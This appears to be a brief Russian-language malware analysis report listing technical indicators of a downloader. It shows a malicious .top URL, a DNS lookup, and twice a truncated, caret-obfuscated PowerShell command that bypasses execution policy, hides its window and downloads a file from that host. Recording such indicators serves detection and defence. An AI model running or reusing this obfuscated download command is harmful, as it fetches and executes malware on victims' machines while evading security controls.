Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eRsH^ELL^.e^x^E^ -E^XE^c^uTiOnP^Oli^CY^ B^Y^P^asS -noprOFIlE -^w^iNdOWs^tY^LE hIDdEn^ ^(new-ObJec^T S^YStEm.^n^Et.W^eB^C^l^ieNT)^.dOw^nLOADfi^le^(^'http://roggistazli....
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eRsH^ELL^.e^x^E^ -E^XE^c^uTiOnP^Oli^CY^ B^Y^P^asS -noprOFIlE -^w^iNdOWs^tY^LE hIDdEn^ ^(new-ObJec^T S^YStEm.^n^Et.W^eB^C^l^ieNT)^.dOw^nLOADfi^le^(^'http://roggistazli....' (со скрытым окном)